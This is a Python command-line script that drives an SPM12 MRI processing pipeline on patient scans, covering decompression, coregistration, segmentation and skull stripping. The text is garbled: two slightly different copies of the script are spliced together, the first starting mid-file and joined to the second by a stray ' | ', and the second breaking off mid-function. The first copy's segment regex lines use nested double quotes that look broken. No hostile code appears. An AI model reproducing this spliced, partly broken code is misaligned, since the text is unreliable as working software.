parser.add_argument("--mcr-path", default = "/data/eck/software/MCR/v97",
help="m-script-archive.",
type=str, nargs='?')
parser.add_argument("-l", "--log-file", default = f'''spm12_cmdline_{datetime.datetime.now().strftime('%y%m%d')}.log''',
help="log file.",
type=str, nargs='?')
# parser_b = subparsers.add_parser('b', help='b help')
# parser_b.add_argument('--baz', choices='XYZ', help='baz help')
args=parser.parse_args()
### Create Logger
from crispy13 import create_logger
logger = create_logger(file_handler_path = args.log_file)
from crispy13.core.ecf import cus_excepthook
sys.excepthook=cus_excepthook(logger)
logger.info(args)
### Input dict functions
def if_found_return_groups(pattern, iterable, group_index = None, flags = 0):
r = []
for i in iterable:
sr1 = re.search(pattern, i, flags = flags) #search result
if sr1:
r.append(sr1.groups()) if group_index is None else r.append(sr1.group(group_index))
else:
pass
return r
class spm12_input_dict:
def __init__(self, root_folder, img_types, pid = None, file_extension = ".nii"):
self.root_folder = os.path.abspath(root_folder)
self.img_types = img_types
self.file_extension = file_extension
self.fep = re.sub("\.", "\\.", file_extension) # file_extension_pattern
self.set_input_dict(root_folder, img_types, pid)
def __str__(self):
return self.values.__str__()
def __repr__(self):
return self.values.__repr__()
def set_input_dict(self, root_folder, img_types, pid):
root_folder = os.path.abspath(root_folder)
tfl1 = glob.glob(f"{root_folder}/**/*{self.file_extension}", recursive = True) # temp folder list 1
# modify pid variable.
if (pid == 'all') or (pid == ['all']):
pid = set(if_found_return_groups("[0-9]{8}", tfl1, 0))
elif isinstance(pid, int):
pid = [str(pid)]
elif pid is None:
raise ValueError(f"pid should be given.")
self.pid = pid
input_dict = dict.fromkeys(self.pid)
for i in input_dict:
gr1 = glob.glob(f"{root_folder}/**/{i}/**/*{self.file_extension}", recursive = True)
if len(gr1) == 0: raise ValueError(f"gr1 has nothing. {i}\n{gr1}")
if re.search("_final.nii", self.file_extension) is None:
gr1 = list(filter(lambda x:re.search("/(?:[rmc]{1,2}|mean).*" + self.fep, x) is None, gr1))
gr1 = list(filter(lambda x:re.search("/[^\n/]*mask" + self.fep, x, re.I) is None, gr1))
gr1 = list(filter(lambda x:re.search("/.*_final" + self.fep, x) is None, gr1))
else:
pass
if len(gr1) == 0: raise ValueError(f"gr1_2 has nothing. {i}\n{gr1}")
ifr1 = set(if_found_return_groups("[0-9]{8}/([0-9]{4}[-]?[0-9]{2}[-]?[0-9]{2})", gr1, group_index = 1))
if len(ifr1) == 0: raise ValueError(f"ifr1 has nothing. {i}\nifr1:{ifr1}\ngr1:{gr1}")
input_dict[i] = dict.fromkeys(ifr1)
for j in input_dict[i]:
td = {}
for t in img_types:
if t != 'seg':
tt= 't1' if t=='t1ce' else t
tl = if_found_return_groups("^((?!roi|seg|label|RL).)*$",
if_found_return_groups(f"{root_folder}(?:/[^/\n]+)*/{i}/{j}/{t}/[^/\n]*{self.fep}", gr1, 0, re.I),
0,
re.I)
if len(tl) == 1:
td[t] = tl[0]
else:
raise ValueError(f"The number of found paths is not one. {tl} {i} {j} {t} {tt} {gr1}")
else:
tl = if_found_return_groups(f"{root_folder}(?:/[^/\n]+)*/{i}/{j}/[^/\n]*(?:roi|seg|label)[^/\n]*{self.fep}", gr1, 0, re.I)
if len(tl) == 1:
td[t] = tl[0]
else:
raise ValueError(f"The number of found paths is not one. {tl} {i} {j} {t} {tt} {gr1}")
input_dict[i][j] = td
self.values = input_dict
### Gunzip functions
def flatten_dict(d):
"""
https://stackoverflow.com/questions/52081545/python-3-flattening-nested-dictionaries-and-lists-within-dictionaries
"""
out = {}
for key, val in d.items():
if isinstance(val, dict):
val = [val]
if isinstance(val, list):
for subdict in val:
deeper = flatten_dict(subdict).items()
out.update({key + '_' + key2: val2 for key2, val2 in deeper})
else:
out[key] = val
return out
def gunzip_nii_gz_files(root_folder, scan_types, patient_id):
nii_gz_dict = spm12_input_dict(root_folder, scan_types, patient_id, ".nii.gz")
nii_gz_dict.values = flatten_dict(nii_gz_dict.values)
for f in nii_gz_dict.values.values():
nf = re.sub("\.nii\.gz", ".nii", f)
logger.info(f"Gunzip {f} to {nf} ...")
with gzip.open(f, 'r') as f_in, open(nf, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
logger.info(f">>> Gunzip complete.")
def gzip_nii_files(root_folder, scan_types, patient_id, nii_file_pattern = "_final.nii"):
nii_dict = spm12_input_dict(root_folder, scan_types, patient_id, nii_file_pattern)
nii_dict.values = flatten_dict(nii_dict.values)
for f in nii_dict.values.values():
nf = re.sub("\.nii", ".nii.gz", f)
logger.info(f"Gzip {f} ...")
with open(f, 'rb') as f_in, gzip.open(nf, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
logger.info(f">>> Gzip complete.")
### Convert Functions
def convert_mscript(process, inputs):
inputs = list(map(lambda x:f"'{x}'", inputs))
with open(f"{args.m_script_archive}/{process}.m", 'r') as f:
contents = f.read()
logger.info(f"Before converting script:\n{contents}\n")
# Edit Realignment script
# inputs will be T1 + seg or T2
if process == 'realignment':
inputs_string = '\n' + '\n'.join(inputs) + '\n'
ir = re.sub("\{[^{]*'.+'[^}]*\}", f"{{{inputs_string}}}", contents)
logger.info("Below the if realignment sentence constructure")
# Edit Coregistration script
# inputs will be T1 + T2.
if process == 'coregistration':
ir = re.sub("(\.ref = ){'.+'}", f"\g<1>{{{inputs[0]}}}", contents)
ir = re.sub("(\.source = ){'.+'}", f"\g<1>{{{inputs[1]}}}", ir)
if len(inputs) > 2:
try:
input_strings = '\n' + '\n'.join(inputs[2:]) + '\n'
ir = re.sub("(\.other = ){'.*'}", f"\g<1>{{{input_strings}}}", ir)
except IndexError:
pass
logger.info("Below the if coregistration sentence constructure")
# Edit segment script
# inputs will be T1 + T2.
if process == 'segment':
ir = contents
for i in range(len(inputs)):
ir = re.sub(f"(\.channel\({i+1}\).vols = ){{".+"}}", f"\g<1>{{{inputs[i]}}}", ir)
ir = re.sub(f"(\.affreg = )'mni'", f"\g<1>'{args.affine_regularisation}'", ir)
logger.info("Below the if segment sentence constructure")
if (process == 'segment_only_t1_cleanup') or (process == 'segment_only_t1_no-cleanup'):
ir = contents
logger.info("ir = contents")
ir = re.sub(f"(\.channel.vols = ){{"[^\n{{}}]+"}}", f"\g<1>{{{inputs[0]}}}", ir)
logger.info('''ir = re.sub(f"(\.channel.vols = ){{"[^\n{{}}]+"}}", f"\g<1>{{{inputs[0]}}}", ir)''')
ir = re.sub(f"(\.affreg = )'mni'", f"\g<1>'{args.affine_regularisation}'", ir)
logger.info("Below the if segment_only_t1_cleanup sentence constructure")
# Edit imgcalc script
# inputs will be T1 + T2.
if process == 'imgcalc_mask':
inputs_string = '\n' + '\n'.join(inputs[:4]) + '\n'
ir = re.sub("(\.imcalc.input = )\{(?:[^{]*'.+'[^{]*)*\}", f"\g<1>{{{inputs_string}}}", contents)
ir = re.sub("(\.imcalc.output = )'.+'", f"\g<1>{inputs[4]}", ir)
ir = re.sub("(\.imcalc.outdir = ){'.+'}", f"\g<1>{{{inputs[5]}}}", ir)
logger.info("Below the if img calc mask sentence constructure")
# Edit imgcalc script
# inputs will be T1 + T2.
if process == 'imgcalc':
inputs_string = '\n' + '\n'.join(inputs[:4]) + '\n'
ir = re.sub("(\.imcalc.input = )\{(?:[^{]*'.+'[^{]*)*\}", f"\g<1>{{{inputs_string}}}", contents)
ir = re.sub("(\.imcalc.output = )'.+'", f"\g<1>{inputs[4]}", ir)
ir = re.sub("(\.imcalc.outdir = ){'.+'}", f"\g<1>{{{inputs[5]}}}", ir)
logger.info("Below the if img calc sentence constructure")
edited_contents = f'''
spm defaults fmri
spm_jobman initcfg
{ir}
spm_jobman('run',matlabbatch);
'''
logger.info("edited_contents variable was made.")
logger.info(f"After converting script:\n{edited_contents}\n")
logger.info(f'''Running {process.upper()} with inputs:{inputs}''')
ts_file = tempfile.NamedTemporaryFile(prefix = f"{process}_") # temp script file
tfn = ts_file.name
ts_file.close()
with open(f"{tfn}.m", 'w') as f:
f.write(edited_contents)
return f"{tfn}.m"
### Resample functions
def resample_mri(input_path, voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>_resampled\g<2>"):
"""
Resample mri nii file and save it to a file.
"""
output_path = re.sub("/([^/\n]+)(\.[^.\n]+?)$", output_path_modifier, input_path)
logger.info(f"resample_mri: output_path = {output_path}")
input_img = nibabel.load(input_path)
resampled_img = nibabel.processing.resample_to_output(input_img, voxel_size)
nibabel.save(resampled_img, output_path)
### Run functions
def _run_m_script(m_script, MCR_path=args.mcr_path):
cmd1 = f'''run_spm12.sh {MCR_path} script {m_script}'''
logger.info(f"running the following command:\n{cmd1}")
p1 = Popen(shlex.split(cmd1), stdout=PIPE)
p1_stdout, p1_stderr = p1.communicate()
if p1.returncode != 0:
logger.info(f"Stdout:\n{p1_stdout}")
logger.info(f"Stderr:\n{p1_stderr}")
logger.info(f"Return code: {p1.returncode}")
raise Exception(f"Job failed.")
def run_spm12_process(input_dict):
if input_dict.__class__.__name__ != spm12_input_dict.__name__: raise ValueError("input_dict should be an instance of spm12_input_dict class.")
pid = input_dict.pid
input_data = input_dict.values
img_types = input_dict.img_types
for p in pid:
logger.info(f"Current patient id: {p}.")
for ts in input_data[p]: # ts = time series
logger.info(f"MRI Image date: {ts}")
# run realignment
# for t in img_types[:-1]:
# if t == 't1ce':
# inputs = [input_data[p][ts][t]]
# m_script = convert_mscript("realignment", inputs)
# _run_m_script(m_script) # T1 & label realignment
# os.remove(m_script)
# else:
# inputs = [input_data[p][ts][t]]
# m_script = convert_mscript("realignment", inputs)
# _run_m_script(m_script) # T2 realignment
# os.remove(m_script)
# resample t1ce
if args.resample is True:
resample_mri(input_data[p][ts]['t1ce'], voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>\g<2>")
resample_mri(input_data[p][ts]['seg'], voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>_final\g<2>")
# Make temp img types(excluding seg)
tit = deepcopy(img_types) #temp img types
tit.remove('t1')
tit.insert(0, 't1')
try:
tit.remove('seg')
except:
logger.info(f"temp img types doesn't have 'seg'.")
# run coregistration
for t in tit:
if t == 't1ce':
continue
inputs = [input_data[p][ts]['t1ce'], input_data[p][ts][t]]
m_script = convert_mscript("coregistration", inputs)
_run_m_script(m_script) # T1 & T2 coregistration
os.remove(m_script)
if img_types[-1] == 'seg':
shutil.move(input_data[p][ts]['seg'], re.sub("/([^\n/]*)\.nii", "/\g<1>_RL_final.nii", input_data[p][ts]['seg'])) # For consistency of the names of final products.
# run segment
inputs = []
for i in range(len(tit)):
t = tit[i]
if t == 't1ce':
inputs.append(input_data[p][ts][t])
else:
inputs.append(re.sub(f"/([^\n/]+\.nii)", "/r\g<1>", input_data[p][ts][t]))
# ### lines for resample(not segment)
# for ri in inputs:
# resample_mri(ri, voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>\g<2>")
# ###
m_script = convert_mscript("segment", inputs)
_run_m_script(m_script) # T1 & T2 segment
os.remove(m_script)
# Make mask for stripping skull(clean up).
inputs = [re.sub(f"/([^\n/]+\.nii)", "/r\g<1>", input_data[p][ts]['t1'])]
logger.info(f"inputs for clean up segment were made.")
m_script = convert_mscript("segment_only_t1_cleanup", inputs)
logger.info(f"m_script was made.")
_run_m_script(m_script) # segment T1 only
logger.info(f"running m_script complete.")
os.remove(m_script)
# Rename c* files(clean up).
cf = re.sub("/[^\n/]+\.nii", "", input_data[p][ts]['t1']) # current folder
for file in list(filter(lambda x:re.search("cleanup", x) is None, glob.glob(f"{cf}/c*.nii"))):
nn = re.sub("/(c[0-9])([^\n/]+)\.nii", "/\g<1>\g<2>_cleanup.nii", file) # new name
shutil.move(file, nn)
logger.info(f"{file} was renamed to {nn}.")
# Make mask for stripping skull(no clean up).
inputs = [re.sub(f"/([^\n/]+\.nii)", "/r\g<1>", input_data[p][ts]['t1'])]
m_script = convert_mscript("segment_only_t1_no-cleanup", inputs)
_run_m_script(m_script) # segment T1 only
os.remove(m_script)
# Rename c* files(no clean up).
cf = re.sub("/[^\n/]+\.nii", "", input_data[p][ts]['t1']) # current folder
for file in list(filter(lambda x:re.search("cleanup", x) is None, glob.glob(f"{cf}/c*.nii"))):
nn = re.sub("/(c[0-9])([^\n/]+)\.nii", "/\g<1>\g<2>_no-cleanup.nii", file) # new name
shutil.move(file, nn)
logger.info(f"{file} was renamed to {nn}.")
# run imgcalc(skull stripping)
for i in range(len(tit)):
t = tit[i]
if t == 't1ce':
inputs = re.sub(f"/([^\n/]+\.nii)", "/m\g<1>", input_data[p][ts][t])
else:
inputs = re.sub(f"/([^\n/]+\.nii)", "/mr\g<1>", input_data[p][ts][t])
inputs = [inputs] + [re.sub(f"/([^\n/]+)\.nii", "/c1r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
+ [re.sub(f"/([^\n/]+)\.nii", "/c2r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
+ [re.sub(f"/([^\n/]+)\.nii", "/c3r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
+ [re.sub(f"^.*/([^\n/]+)\.nii", "\g<1>_BrainExtractionBrain_final.nii", inputs)]\
+ [re.search(f"(^.+)/([^\n/]+\.nii)", inputs).group(1)]
m_script = convert_mscript("imgcalc", inputs)
_run_m_script(m_script) # T1 & T2 imgcalc
os.remove(m_script)
# Save mask nii file
inputs = [inputs[0]] + [re.sub(f"/([^\n/]+)\.nii", "/c1r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
+ [re.sub(f"/([^\n/]+)\.nii", "/c2r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
+ [re.sub(f"/([^\n/]+)\.nii", "/c3r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
+ ["BrainExtractionMask.nii"]\
+ [re.search(f"(^.+)/([^\n/]+\.nii)", input_data[p][ts]['t1ce']).group(1)]
m_script = convert_mscript("imgcalc_mask", inputs)
_run_m_script(m_script) # T1 & T2 imgcalc
os.remove(m_script)
logger.info(f">> SPM Process complete.")
def run_spm12(root_folder, img_types, pid):
img_type_ref = ['t1ce', 't1', 't2', 'flair', 'seg']
for i in img_types:
if i not in img_type_ref: raise ValueError(f"Invaild img type. Ref = {img_type_ref}.")
if 'seg' in img_types:
img_types.remove('seg')
img_types.insert(len(img_types), 'seg')
if 't1ce' in img_types:
img_types.remove('t1ce')
img_types.insert(0, 't1ce')
gunzip_nii_gz_files(root_folder, img_types, pid)
input_dict = spm12_input_dict(root_folder, img_types, pid)
run_spm12_process(input_dict)
gzip_nii_files(root_folder, img_types, pid, nii_file_pattern = "_final.nii")
gzip_nii_files(root_folder, ['t1ce'], pid, nii_file_pattern = "Mask.nii")
logger.info(f">> The whole processes complete.")
def communicate_subprocesses(subpcs, pids, return_code_dict):
# How about using subprcoess.poll method? https://stackoverflow.com/questions/41167884/dont-wait-for-subprocesses-but-check-for-returncode-later-on
for i in range(len(subpcs)):
sp = subpcs[i]
try:
pr = sp.poll()
if pr != return_code_dict[pids[i]]:
logger.info(f"The return code of process of {pids[i]}: {pr}")
return_code_dict[pids[i]]=pr
except TimeoutExpired as e:
continue
return return_code_dict
if args.command == 'convert':
convert_mscript(args.m_script, args.output)
logger.info("Converting process complete.")
elif args.command == 'gunzip':
gunzip_nii_gz_files(args.root_folder, args.scan_types, args.patient_id)
elif args.command == 'resample':
resample_mri(args.input_path, args.voxel_size)
elif args.command == 'run':
logger.info(f"patient id : {args.patient_id}")
subpcs = []
args.root_folder = os.path.abspath(args.root_folder)
args.m_script_archive = os.path.abspath(args.m_script_archive)
if (len(args.patient_id) > 1) or (args.patient_id == ['all']):
if args.patient_id == ['all']:
pids = set(if_found_return_groups("[0-9]{8}", glob.glob(f"{args.root_folder}/**/*.nii.gz", recursive = True), 0))
pids = list(pids)
else:
pids = args.patient_id
assert len(args.patient_id) == len(pids), "Found patient ids were not matched to input patient ids."
os.makedirs(f"{args.root_folder}/spm12_logs", exist_ok=True)
return_code_dict = dict.fromkeys(pids)
for pid in pids:
logger.info(f'''python {args.m_script_archive}/spm12_cmdline_main.py -l {args.root_folder}/spm12_logs/{pid}_spm12_run.log run {args.root_folder} {pid} -s {' '.join(args.scan_types)}'''.split())
subpcs.append(
Popen(f'''python {args.m_script_archive}/spm12_cmdline_main.py -l {args.root_folder}/spm12_logs/{pid}_spm12_run.log run {args.root_folder} {pid} -s {' '.join(args.scan_types)}'''.split(),
stdout = DEVNULL, stderr = DEVNULL, cwd = os.getcwd())
)
while None in return_code_dict.values():
return_code_dict = communicate_subprocesses(subpcs, pids, return_code_dict)
time.sleep(5)
logger.info(f"Job orders: {pids}")
logger.info(f"Exit codes: {return_code_dict.items()}")
elif (len(args.patient_id) == 1) and (re.search("[0-9]{8}", args.patient_id[0]) is not None):
run_spm12(args.root_folder, args.scan_types, args.patient_id) | import os,re,glob,sys,argparse,tempfile
from subprocess import Popen, PIPE, run, TimeoutExpired, DEVNULL
import datetime,shlex,time
import nibabel, nibabel.processing
import gzip, shutil
from copy import deepcopy
import sys
if sys.version_info[0] < 3:
raise Exception("Python 3.0+ is needed.")
# Get Arguments
parser=argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="A script to execute spm12 at command line.")
# Positional arugment : command
subparsers=parser.add_subparsers(metavar= 'command', required = True)
parser_convert = subparsers.add_parser('convert', help='convert .m script into commandline-available script.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_convert.set_defaults(command = 'convert')
parser_convert.add_argument('m_script', type=str, help='m script file to convert.')
parser_convert.add_argument('output', type=str, help='output file path.')
parser_gunzip = subparsers.add_parser('gunzip', help='gunzip nii.gz files.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_gunzip.set_defaults(command = 'gunzip')
parser_gunzip.add_argument("root_folder", help="root folder to search mri files.")
parser_gunzip.add_argument("patient_id", default = 'all', help="Patient ID.", nargs='*')
parser_gunzip.add_argument("-s", "--scan-types", default = ['t1', 't1ce', 't2', 'flair', 'seg'],
help="A list of available image scan types.(e.g. -s t1ce t2 seg) The last element of this should be 'seg'. Otherwise it will malfunction.",
type=str, nargs='+')
parser_resample = subparsers.add_parser('resample', help='resample a mri image.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_resample.set_defaults(command = 'resample')
parser_resample.add_argument('input_path', type=str, help='nii file to resample.')
parser_resample.add_argument('-vs', "--voxel_size", default=[1,1,1], type=int, help='voxel size(e.g. -vs 2 2 2)', nargs='+')
parser_run = subparsers.add_parser('run', help='run spm12 process pipeline.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_run.set_defaults(command = 'run')
parser_run.add_argument("root_folder", help="root folder to search mri files.")
parser_run.add_argument("patient_id", default = 'all', help="Patient ID.", nargs='*')
parser_run.add_argument("-s", "--scan-types", default = ['t1', 't1ce', 't2', 'flair', 'seg'],
help="A list of available image scan types.(e.g. -s t1ce t2 seg) The last element of this should be 'seg'. Otherwise it will malfunction.",
type=str, nargs='+')
parser_run.add_argument("-m", "--m-script-archive", default = "/data/eck/CustomScriptsArchive/spm12_scripts",
help="m-script-archive.",
type=str, nargs='?')
parser_run.add_argument("-rs", "--resample", action="store_true",
help="Whether you want to include resampling step in the run process.",
)
parser_run.add_argument("-ar", "--affine-regularisation", help="ICBM European brains:mni, ICBM east asian:eastern, Average sized template:subj, default no affine regularisation(empty string)", nargs='?', default='')
parser.add_argument("--mcr-path", default = "/data/eck/software/MCR/v97",
help="m-script-archive.",
type=str, nargs='?')
parser.add_argument("-l", "--log-file", default = f'''spm12_cmdline_{datetime.datetime.now().strftime("%y%m%d")}.log''',
help="log file.",
type=str, nargs='?')
# parser_b = subparsers.add_parser('b', help='b help')
# parser_b.add_argument('--baz', choices='XYZ', help='baz help')
args=parser.parse_args()
### Create Logger
from crispy13 import create_logger
logger = create_logger(file_handler_path = args.log_file)
from crispy13.core.ecf import cus_excepthook
sys.excepthook=cus_excepthook(logger)
logger.info(args)
### Input dict functions
def if_found_return_groups(pattern, iterable, group_index = None, flags = 0):
r = []
for i in iterable:
sr1 = re.search(pattern, i, flags = flags) #search result
if sr1:
r.append(sr1.groups()) if group_index is None else r.append(sr1.group(group_index))
else:
pass
return r
class spm12_input_dict:
def __init__(self, root_folder, img_types, pid = None, file_extension = ".nii"):
self.root_folder = os.path.abspath(root_folder)
self.img_types = img_types
self.file_extension = file_extension
self.fep = re.sub("\.", "\\.", file_extension) # file_extension_pattern
self.set_input_dict(root_folder, img_types, pid)
def __str__(self):
return self.values.__str__()
def __repr__(self):
return self.values.__repr__()
def set_input_dict(self, root_folder, img_types, pid):
root_folder = os.path.abspath(root_folder)
tfl1 = glob.glob(f"{root_folder}/**/*{self.file_extension}", recursive = True) # temp folder list 1
# modify pid variable.
if (pid == 'all') or (pid == ['all']):
pid = set(if_found_return_groups("[0-9]{8}", tfl1, 0))
elif isinstance(pid, int):
pid = [str(pid)]
elif pid is None:
raise ValueError(f"pid should be given.")
self.pid = pid
input_dict = dict.fromkeys(self.pid)
for i in input_dict:
gr1 = glob.glob(f"{root_folder}/**/{i}/**/*{self.file_extension}", recursive = True)
if len(gr1) == 0: raise ValueError(f"gr1 has nothing. {i}\n{gr1}")
if re.search("_final.nii", self.file_extension) is None:
gr1 = list(filter(lambda x:re.search("/(?:[rmc]{1,2}|mean).*" + self.fep, x) is None, gr1))
gr1 = list(filter(lambda x:re.search("/[^\n/]*mask" + self.fep, x, re.I) is None, gr1))
gr1 = list(filter(lambda x:re.search("/.*_final" + self.fep, x) is None, gr1))
else:
pass
if len(gr1) == 0: raise ValueError(f"gr1_2 has nothing. {i}\n{gr1}")
ifr1 = set(if_found_return_groups("[0-9]{8}/([0-9]{4}[-]?[0-9]{2}[-]?[0-9]{2})", gr1, group_index = 1))
if len(ifr1) == 0: raise ValueError(f"ifr1 has nothing. {i}\nifr1:{ifr1}\ngr1:{gr1}")
input_dict[i] = dict.fromkeys(ifr1)
for j in input_dict[i]:
td = {}
for t in img_types:
if t != 'seg':
tt= 't1' if t=='t1ce' else t
tl = if_found_return_groups("^((?!roi|seg|label|RL).)*$",
if_found_return_groups(f"{root_folder}(?:/[^/\n]+)*/{i}/{j}/{t}/[^/\n]*{self.fep}", gr1, 0, re.I),
0,
re.I)
if len(tl) == 1:
td[t] = tl[0]
else:
raise ValueError(f"The number of found paths is not one. {tl} {i} {j} {t} {tt} {gr1}")
else:
tl = if_found_return_groups(f"{root_folder}(?:/[^/\n]+)*/{i}/{j}/[^/\n]*(?:roi|seg|label)[^/\n]*{self.fep}", gr1, 0, re.I)
if len(tl) == 1:
td[t] = tl[0]
else:
raise ValueError(f"The number of found paths is not one. {tl} {i} {j} {t} {tt} {gr1}")
input_dict[i][j] = td
self.values = input_dict
### Gunzip functions
def flatten_dict(d):
"""
https://stackoverflow.com/questions/52081545/python-3-flattening-nested-dictionaries-and-lists-within-dictionaries
"""
out = {}
for key, val in d.items():
if isinstance(val, dict):
val = [val]
if isinstance(val, list):
for subdict in val:
deeper = flatten_dict(subdict).items()
out.update({key + '_' + key2: val2 for key2, val2 in deeper})
else:
out[key] = val
return out
def gunzip_nii_gz_files(root_folder, scan_types, patient_id):
nii_gz_dict = spm12_input_dict(root_folder, scan_types, patient_id, ".nii.gz")
nii_gz_dict.values = flatten_dict(nii_gz_dict.values)
for f in nii_gz_dict.values.values():
nf = re.sub("\.nii\.gz", ".nii", f)
logger.info(f"Gunzip {f} to {nf} ...")
with gzip.open(f, 'r') as f_in, open(nf, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
logger.info(f">>> Gunzip complete.")
def gzip_nii_files(root_folder, scan_types, patient_id, nii_file_pattern = "_final.nii"):
nii_dict = spm12_input_dict(root_folder, scan_types, patient_id, nii_file_pattern)
nii_dict.values = flatten_dict(nii_dict.values)
for f in nii_dict.values.values():
nf = re.sub("\.nii", ".nii.gz", f)
logger.info(f"Gzip {f} ...")
with open(f, 'rb') as f_in, gzip.open(nf, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
logger.info(f">>> Gzip complete.")
### Convert Functions
def convert_mscript(process, inputs):
inputs = list(map(lambda x:f"'{x}'", inputs))
with open(f"{args.m_script_archive}/{process}.m", 'r') as f:
contents = f.read()
logger.info(f"Before converting script:\n{contents}\n")
# Edit Realignment script
# inputs will be T1 + seg or T2
if process == 'realignment':
inputs_string = '\n' + '\n'.join(inputs) + '\n'
ir = re.sub("\{[^{]*'.+'[^}]*\}", f"{{{inputs_string}}}", contents)
logger.info("Below the if realignment sentence constructure")
# Edit Coregistration script
# inputs will be T1 + T2.
if process == 'coregistration':
ir = re.sub("(\.ref = ){'.+'}", f"\g<1>{{{inputs[0]}}}", contents)
ir = re.sub("(\.source = ){'.+'}", f"\g<1>{{{inputs[1]}}}", ir)
if len(inputs) > 2:
try:
input_strings = '\n' + '\n'.join(inputs[2:]) + '\n'
ir = re.sub("(\.other = ){'.*'}", f"\g<1>{{{input_strings}}}", ir)
except IndexError:
pass
logger.info("Below the if coregistration sentence constructure")
# Edit segment script
# inputs will be T1 + T2.
if process == 'segment':
ir = contents
for i in range(len(inputs)):
ir = re.sub(f"(\.channel\({i+1}\).vols = ){{'.+'}}", f"\g<1>{{{inputs[i]}}}", ir)
ir = re.sub(f"(\.affreg = )'mni'", f"\g<1>'{args.affine_regularisation}'", ir)
logger.info("Below the if segment sentence constructure")
if (process == 'segment_only_t1_cleanup') or (process == 'segment_only_t1_no-cleanup'):
ir = contents
logger.info("ir = contents")
ir = re.sub(f"(\.channel.vols = ){{'[^\n{{}}]+'}}", f"\g<1>{{{inputs[0]}}}", ir)
logger.info('''ir = re.sub(f"(\.channel.vols = ){{'[^\n{{}}]+'}}", f"\g<1>{{{inputs[0]}}}", ir)''')
ir = re.sub(f"(\.affreg = )'mni'", f"\g<1>'{args.affine_regularisation}'", ir)
logger.info("Below the if segment_only_t1_cleanup sentence constructure")
# Edit imgcalc script
# inputs will be T1 + T2.
if process == 'imgcalc_mask':
inputs_string = '\n' + '\n'.join(inputs[:4]) + '\n'
ir = re.sub("(\.imcalc.input = )\{(?:[^{]*'.+'[^{]*)*\}", f"\g<1>{{{inputs_string}}}", contents)
ir = re.sub("(\.imcalc.output = )'.+'", f"\g<1>{inputs[4]}", ir)
ir = re.sub("(\.imcalc.outdir = ){'.+'}", f"\g<1>{{{inputs[5]}}}", ir)
logger.info("Below the if img calc mask sentence constructure")
# Edit imgcalc script
# inputs will be T1 + T2.
if process == 'imgcalc':
inputs_string = '\n' + '\n'.join(inputs[:4]) + '\n'
ir = re.sub("(\.imcalc.input = )\{(?:[^{]*'.+'[^{]*)*\}", f"\g<1>{{{inputs_string}}}", contents)
ir = re.sub("(\.imcalc.output = )'.+'", f"\g<1>{inputs[4]}", ir)
ir = re.sub("(\.imcalc.outdir = ){'.+'}", f"\g<1>{{{inputs[5]}}}", ir)
logger.info("Below the if img calc sentence constructure")
edited_contents = f'''
spm defaults fmri
spm_jobman initcfg
{ir}
spm_jobman('run',matlabbatch);
'''
logger.info("edited_contents variable was made.")
logger.info(f"After converting script:\n{edited_contents}\n")
logger.info(f'''Running {process.upper()} with inputs:{inputs}''')
ts_file = tempfile.NamedTemporaryFile(prefix = f"{process}_") # temp script file
tfn = ts_file.name
ts_file.close()
with open(f"{tfn}.m", 'w') as f:
f.write(edited_contents)
return f"{tfn}.m"
### Resample functions
def resample_mri(input_path, voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>_resampled\g<2>"):
"""
Resample mri nii file and save it to a file.
"""
output_path = re.sub("/([^/\n]+)(\.[^.\n]+?)$", output_path_modifier, input_path)
logger.info(f"resample_mri: output_path = {output_path}")
input_img = nibabel.load(input_path)
resampled_img = nibabel.processing.resample_to_output(input_img, voxel_size)
nibabel.save(resampled_img, output_path)
### Run functions
def _run_m_script(m_script, MCR_path=args.mcr_path):
cmd1 = f'''run_spm12.sh {MCR_path} script {m_script}'''
logger.info(f"running the following command:\n{cmd1}")
p1 = Popen(shlex.split(cmd1), stdout=PIPE)
p1_stdout, p1_stderr = p1.communicate()
if p1.returncode != 0:
logger.info(f"Stdout:\n{p1_stdout}")
logger.info(f"Stderr:\n{p1_stderr}")
logger.info(f"Return code: {p1.returncode}")
raise Exception(f"Job failed.")
def run_spm12_process(input_dict):
if input_dict.__class__.__name__ != spm12_input_dict.__name__: raise ValueError("input_dict should be an instance of spm12_input_dict class.")
pid = input_dict.pid
input_data = input_dict.values
img_types = input_dict.img_types
for p in pid:
logger.info(f"Current patient id: {p}.")
for ts in input_data[p]: # ts = time series
logger.info(f"MRI Image date: {ts}")
# run realignment
# for t in img_types[:-1]:
# if t == 't1ce':
# inputs = [input_data[p][ts][t]]
# m_script = convert_mscript("realignment", inputs)
# _run_m_script(m_script) # T1 & label realignment
# os.remove(m_script)
# else:
# inputs = [input_data[p][ts][t]]
# m_script = convert_mscript("realignment", inputs)
# _run_m_script(m_script) # T2 realignment
# os.remove(m_script)
# resample t1ce
if args.resample is True:
resample_mri(input_data[p][ts]['t1ce'], voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>\g<2>")
resample_mri(input_data[p][ts]['seg'], voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>_final\g<2>")
# Make temp img types(excluding seg)
tit = deepcopy(img_types) #temp img types
tit.remove('t1')
tit.insert(0, 't1')
try:
tit.remove('seg')
except:
logger.info(f"temp img types doesn't have 'seg'.")
# run coregistration
for t in tit:
if t == 't1ce':
continue
inputs = [input_data[p][ts]['t1ce'], input_data[p][ts][t]]
m_script = convert_mscript("coregistration", inputs)
_run_m_script(m_script) # T1 & T2 coregistration
os.remove(m_script)
if img_types[-1] == 'seg':
